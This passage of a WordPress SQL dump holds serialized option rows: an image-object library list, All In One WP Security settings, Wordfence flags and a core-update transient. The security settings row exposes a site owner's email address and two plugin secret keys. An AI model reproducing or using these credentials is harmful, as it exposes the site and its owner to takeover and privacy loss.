File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:40;a:13:{s:2:\"id\";s:2:\"40\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_wallet_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:22:\"Black Leather Document\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:39;a:13:{s:2:\"id\";s:2:\"39\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_quill_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Quill Feather 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:38;a:13:{s:2:\"id\";s:2:\"38\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:24:\"object_eiffeltower_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Eiffeltower\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:37;a:13:{s:2:\"id\";s:2:\"37\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"object_magazine_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Open Book 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1333\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:36;a:13:{s:2:\"id\";s:2:\"36\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_book_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Blank Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:35;a:13:{s:2:\"id\";s:2:\"35\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"object_glasses_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Hipster Glasses\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:34;a:13:{s:2:\"id\";s:2:\"34\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_book_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Open Book 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:33;a:13:{s:2:\"id\";s:2:\"33\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_gloves_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Black Gloves\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:32;a:13:{s:2:\"id\";s:2:\"32\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_typewriter_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Retro Typewriter\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:31;a:13:{s:2:\"id\";s:2:\"31\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_book_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Open Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:30;a:13:{s:2:\"id\";s:2:\"30\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_wallet_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Black Wallet\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:29;a:13:{s:2:\"id\";s:2:\"29\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_purse_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Black Purse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:28;a:13:{s:2:\"id\";s:2:\"28\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_quill_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Quill Feather\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:27;a:13:{s:2:\"id\";s:2:\"27\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_artbox_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Art Box Colors 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:26;a:13:{s:2:\"id\";s:2:\"26\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_cloth_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"Cloth Paint Color\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:25;a:13:{s:2:\"id\";s:2:\"25\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"object_brushpot_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Brush Pot\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"984\";s:6:\"height\";s:3:\"984\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:24;a:13:{s:2:\"id\";s:2:\"24\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:24:\"object_paintbucket_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Paint Bucket\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:23;a:13:{s:2:\"id\";s:2:\"23\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_paintbrush_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Paintbrush 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"700\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:22;a:13:{s:2:\"id\";s:2:\"22\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_artbox_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:14:\"Art Box Colors\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:21;a:13:{s:2:\"id\";s:2:\"21\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_paintbrush_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Paintbrush 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1100\";s:6:\"height\";s:4:\"1100\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:20;a:13:{s:2:\"id\";s:2:\"20\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_paintbrush_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Paintbrush 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 10:59:23\";s:6:\"active\";s:1:\"1\";}i:11;a:13:{s:2:\"id\";s:2:\"11\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"table_radio_right.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:18:\"Radio Speaker Wood\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-11 13:37:51\";s:6:\"active\";s:1:\"1\";}i:10;a:13:{s:2:\"id\";s:2:\"10\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"keyboard_apple.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:14:\"Apple Keyboard\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-11 13:37:51\";s:6:\"active\";s:1:\"1\";}i:9;a:13:{s:2:\"id\";s:1:\"9\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"macbook_top_gold.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:18:\"Apple Macbook Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-11 13:37:51\";s:6:\"active\";s:1:\"1\";}i:8;a:13:{s:2:\"id\";s:1:\"8\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"nexus6_front_blue.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:19:\"Google Nexus 6 Blue\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1100\";s:6:\"height\";s:4:\"1100\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-11 13:37:51\";s:6:\"active\";s:1:\"1\";}}s:4:\"tags\";a:18:{i:28;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}i:5;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:20;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:21;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:25;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:16;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}i:26;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}i:18;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:4;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:19;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:23;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:3;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:24;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:22;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:29;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}i:27;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}}', 'no');
INSERT INTO `zdenl_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(10206, 'bsf_skip_author', '', 'no'),
(50911, 'aiowps_temp_configs', 'a:89:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:0:\"\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";s:1:\"3\";s:24:\"aiowps_retry_time_period\";s:1:\"5\";s:26:\"aiowps_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:21:\"markavincim@gmail.com\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"nosmw3jhhb18pz24fwyd\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:0:\"\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"e7v1mp5ibmjo111nvav3\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:21:\"markavincim@gmail.com\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:21:\"markavincim@gmail.com\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:22:\"aiowps_login_page_slug\";s:7:\"yonetim\";s:35:\"aiowps_enable_lost_password_captcha\";s:0:\"\";}', 'yes'),
(50915, 'wpb_js_google_fonts_subsets', 'a:1:{i:0;s:5:\"latin\";}', 'yes'),
(50916, 'wpb_js_gutenberg_disable', '1', 'yes'),
(50917, 'wpb_js_default_template_post_type', 'a:0:{}', 'yes'),
(50922, 'wp_page_for_privacy_policy', '0', 'yes'),
(50923, 'show_comments_cookies_opt_in', '1', 'yes'),
(50924, 'admin_email_lifespan', '0', 'yes'),
(50925, 'db_upgraded', '', 'yes'),
(50929, 'recovery_keys', 'a:0:{}', 'yes'),
(50930, 'can_compress_scripts', '0', 'yes'),
(50931, 'wordfence_ls_version', '1.0.5', 'yes'),
(50932, 'wordfence_version', '7.4.5', 'yes'),
(50933, 'wordfence_case', '1', 'yes'),
(50934, 'wordfence_installed', '1', 'yes'),
(50935, 'wordfenceActivated', '1', 'yes'),
(50936, 'wf_plugin_act_error', '', 'yes'),
(51594, 'wordfence_syncAttackDataAttempts', '0', 'no'),
(51595, 'wordfence_syncingAttackData', '0', 'no'),
(51597, 'wordfence_lastSyncAttackData', '1596961109', 'no'),
(66638, '_site_transient_update_core', 'O:8:\"stdClass\":4:{s:7:\"updates\";a:4:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:63:\"https://downloads.wordpress.org/release/tr_TR/wordpress-5.5.zip\";s:6:\"locale\";s:5:\"tr_TR\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:63:\"https://downloads.wordpress.org/release/tr_TR/wordpress-5.5.zip\";s:10:\"no_content\";b:0;s:11:\"new_bundled\";b:0;s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"5.5\";s:7:\"version\";s:3:\"5.5\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.5.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-5.5-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-5.5-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"5.5\";s:7:\"version\";s:3:\"5.5\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.5.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-5.5-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-5.5-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"5.5\";s:7:\"version\";s:3:\"5.5\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupd